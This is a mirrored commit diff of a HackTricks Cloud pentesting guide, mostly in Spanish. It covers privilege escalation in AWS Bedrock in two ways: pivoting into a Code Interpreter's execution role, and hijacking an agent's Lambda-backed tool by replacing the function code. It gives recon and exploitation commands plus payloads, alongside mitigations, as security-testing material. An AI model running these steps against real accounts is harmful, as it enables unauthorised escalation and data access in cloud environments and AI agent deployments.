gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-04-28 12:03:08 -07:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/pentesting-cloud/aws-security/aws-privilege-escalat

Browse Source
This commit is contained in:
Translator
2026-04-21 08:20:53 +00:00
parent c350cf1486
commit 7d862f4e16
1 changed files with 96 additions and 27 deletions
Download Patch File Download Diff File Expand all files Collapse all files

123
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
View File

@@ -6,32 +6,32 @@
### `bedrock-agentcore:StartCodeInterpreterSession` + `bedrock-agentcore:InvokeCodeInterpreter` - Code Interpreter Execution-Role Pivot
AgentCore Code Interpreter es un entorno de ejecución gestionado. Los **Custom Code Interpreters** pueden configurarse con un **`executionRoleArn`** que “proporciona permisos para que el code interpreter acceda a los servicios de AWS”.
AgentCore Code Interpreter es un entorno de ejecución gestionado. Los **Custom Code Interpreters** pueden configurarse con un **`executionRoleArn`** que “proporciona permisos para que el code interpreter acceda a servicios de AWS”.
Si un **IAM principal con menos privilegios** puede **start + invoke** una sesión de Code Interpreter que está configurada con un **rol de ejecución** más privilegiado, el llamante puede efectivamente **pivotar hacia los permisos del rol de ejecución** (movimiento lateral / escalada de privilegios dependiendo del alcance del rol).
Si un **principal IAM con menos privilegios** puede **iniciar + invocar** una sesión de Code Interpreter que está configurada con un **execution role más privilegiado**, el llamador puede efectivamente **pivotar a los permisos del execution role** (lateral movement / privilege escalation según el alcance del role).
> [!NOTE]
> Esto suele ser un problema de **mala configuración / permisos excesivos** (conceder amplios permisos al rol de ejecución del interpreter y/o otorgar acceso amplio para invoke).
> AWS advierte explícitamente evitar la escalada de privilegios asegurando que los roles de ejecución tengan **igual o menos** privilegios que las identidades permitidas para invocar.
> Esto suele ser un problema de **misconfiguration / excessive permissions** (conceder permisos amplios al execution role del interpreter y/o dar acceso amplio de invoke).
> AWS advierte explícitamente evitar privilege escalation asegurando que los execution roles tengan **igual o menos** privilegios que las identidades autorizadas a invocar.
#### Precondiciones (mala configuración común)
#### Preconditions (common misconfiguration)
- Existe un **custom code interpreter** con un **execution role** sobre-privilegiado (ej.: acceso a S3/Secrets/SSM sensibles o capacidades tipo IAM-admin).
- Un usuario (developer/auditor/identidad de CI) tiene permisos para:
- start sessions: `bedrock-agentcore:StartCodeInterpreterSession`
- invoke tools: `bedrock-agentcore:InvokeCodeInterpreter`
- (Opcional) El usuario también puede crear interpreters: `bedrock-agentcore:CreateCodeInterpreter` (le permite crear un nuevo interpreter configurado con un execution role, dependiendo de los controles de la organización).
- Existe un **custom code interpreter** con un **execution role** excesivamente privilegiado (por ejemplo: acceso a S3/Secrets/SSM sensibles o capacidades tipo IAM-admin).
- Un usuario (developer/auditor/CI identity) tiene permisos para:
- iniciar sesiones: `bedrock-agentcore:StartCodeInterpreterSession`
- invocar tools: `bedrock-agentcore:InvokeCodeInterpreter`
- (Opcional) El usuario también puede crear interpreters: `bedrock-agentcore:CreateCodeInterpreter` (le permite crear un nuevo interpreter configurado con un execution role, según los guardrails de la organización).
#### Recon (identify custom interpreters and execution role usage)
#### Recon (identificar custom interpreters y uso de execution role)
Lista interpreters (control-plane) e inspecciona su configuración:
List interpreters (control-plane) e inspecciona su configuración:
```bash
aws bedrock-agentcore-control list-code-interpreters
aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <CODE_INTERPRETER_ID>
````
> El comando create-code-interpreter admite `--execution-role-arn` que define qué permisos de AWS tendrá el intérprete.
```
> El comando create-code-interpreter soporta `--execution-role-arn`, que define qué permisos AWS tendrá el intérprete.
#### Paso 1 - Iniciar una sesión (esto devuelve un `sessionId`, not an interactive shell)
#### Paso 1 - Iniciar una sesión (esto devuelve un `sessionId`, no un shell interactivo)
```bash
SESSION_ID=$(
aws bedrock-agentcore start-code-interpreter-session \
@@ -45,9 +45,9 @@ echo "SessionId: $SESSION_ID"
```
#### Paso 2 - Invocar ejecución de código (Boto3 o HTTPS firmado)
No existe **un shell interactivo de Python** desde `start-code-interpreter-session`. La ejecución ocurre vía **InvokeCodeInterpreter**.
No hay **interactive python shell** desde `start-code-interpreter-session`. La ejecución ocurre mediante **InvokeCodeInterpreter**.
**Opción A - Ejemplo Boto3 (ejecutar Python + verificar identidad):**
**Opción A - Ejemplo de Boto3 (ejecutar Python + verificar identidad):**
```python
import boto3
@@ -70,7 +70,7 @@ print(event)
```
Si el intérprete está configurado con un execution role, la salida de `sts:GetCallerIdentity()` debería reflejar la identidad de ese role (no la del low-priv caller), demostrando el pivot.
**Opción B - Llamada HTTPS firmada (awscurl):**
**Option B - Signed HTTPS call (awscurl):**
```bash
awscurl -X POST \
"https://bedrock-agentcore.<Region>.amazonaws.com/code-interpreters/<CODE_INTERPRETER_IDENTIFIER>/tools/invoke" \
@@ -87,20 +87,88 @@ awscurl -X POST \
}
}'
```
#### Impact
* **Lateral movement** into whatever AWS access the interpreter execution role has.
* **Privilege escalation** if the interpreter execution role is more privileged than the caller.
* Harder detection if CloudTrail data events for interpreter invocations are not enabled (invocations may not be logged by default, depending on configuration).
#### Mitigations / Hardening
* **Least privilege** on the interpreter `executionRoleArn` (treat it like Lambda execution roles / CI roles).
* **Restrict who can invoke** (`bedrock-agentcore:InvokeCodeInterpreter`) and who can start sessions.
* Use **SCPs** to deny InvokeCodeInterpreter except for approved agent runtime roles (org-level enforcement can be necessary).
* Enable appropriate **CloudTrail data events** for AgentCore where applicable; alert on unexpected invocations and session creation.
## Amazon Bedrock Agents
### `lambda:UpdateFunctionCode`, `bedrock:InvokeAgent` - Agent Tool Hijacking via Lambda
Bedrock Agents can use **Lambda-backed action groups** as tools (external execution). If a principal can **modify the code of a Lambda function used by an agent**, and can then **invoke the agent**, they can execute attacker-controlled code under the **Lambda execution role**.
> [!NOTE]
> This is a **cross-service trust abuse** (Bedrock → Lambda), not a vulnerability. The attacker may not be able to invoke the Lambda directly, but can still trigger it via the agent.
#### Preconditions (common misconfiguration)
- A Bedrock Agent exists with an **action group backed by a Lambda function**
- The attacker has:
- `lambda:UpdateFunctionCode`
- `bedrock:InvokeAgent`
- The Lambda execution role has broader permissions than the attacker
- The attacker can identify the Lambda used by the agent
#### Recon
Enumerate agent action groups:
```bash
aws bedrock-agent list-agents
aws bedrock-agent get-agent --agent-id <AGENT_ID>
aws bedrock-agent list-agent-action-groups --agent-id <AGENT_ID> --agent-version DRAFT
```
Inspect Lambda:
```bash
aws lambda get-function --function-name <FUNCTION_NAME>
```
#### Explotación
Reemplazar el código de Lambda:
```bash
zip payload.zip lambda_function.py
aws lambda update-function-code \
--function-name <FUNCTION_NAME> \
--zip-file fileb://payload.zip
```
Ejemplo de payload:
```python
import boto3
def lambda_handler(event, context):
return boto3.client("sts").get_caller_identity()
```
Trigger via agent:
```bash
aws bedrock-agent-runtime invoke-agent \
--agent-id <AGENT_ID> \
--agent-alias-id <ALIAS_ID> \
--session-id test \
--input-text "trigger tool"
```
#### Impacto
* **Movimiento lateral** hacia cualquier acceso de AWS que tenga el rol de ejecución del interpreter.
* **Escalada de privilegios** si el rol de ejecución del interpreter tiene más privilegios que el llamador.
* Detección más difícil si los eventos de datos de CloudTrail para las invocaciones del interpreter no están habilitados (las invocaciones pueden no registrarse por defecto, dependiendo de la configuración).
* **Privilege escalation** en Lambda execution role
* **Exfiltración de datos** desde AWS services
* **Abuse** entre servicios mediante ejecución de trusted agent
#### Mitigaciones / Endurecimiento
#### Mitigations
* **Privilegios mínimos** en el `executionRoleArn` del interpreter (trátalo como los roles de ejecución de Lambda / roles de CI).
* **Restringir quién puede invocar** (`bedrock-agentcore:InvokeCodeInterpreter`) y quién puede iniciar sesiones.
* Usar **SCPs** para denegar InvokeCodeInterpreter, excepto para roles de runtime de agent aprobados (puede ser necesaria la aplicación a nivel de organización).
* Habilitar los **eventos de datos de CloudTrail** apropiados para AgentCore cuando corresponda; generar alertas sobre invocaciones inesperadas y creación de sesiones.
* **Restringir** `lambda:UpdateFunctionCode`
* Usar roles Lambda de **least-privilege**
* **Monitor** cambios de código de Lambda
* **Auditar** el uso de tools del Bedrock agent
## Referencias
## References
- [Sonrai: AWS AgentCore privilege escalation path (SCP mitigation)](https://sonraisecurity.com/blog/aws-agentcore-privilege-escalation-bedrock-scp-fix/)
- [Sonrai: Credential exfiltration paths in AWS code interpreters (MMDS)](https://sonraisecurity.com/blog/sandboxed-to-compromised-new-research-exposes-credential-exfiltration-paths-in-aws-code-interpreters/)
@@ -108,6 +176,7 @@ awscurl -X POST \
- [AWS CLI: start-code-interpreter-session (returns `sessionId`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html)
- [AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-api-reference-examples.html)
- [AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html)
- [SoftwareSecured: AWS Privilege Escalation Techniques (Bedrock agent tool hijacking)](https://www.softwaresecured.com/post/aws-privilege-escalation-iam-risks-service-based-attacks-and-new-ai-driven-bedrock-agentcore-vectors)
{{#include ../../../../banners/hacktricks-training.md}}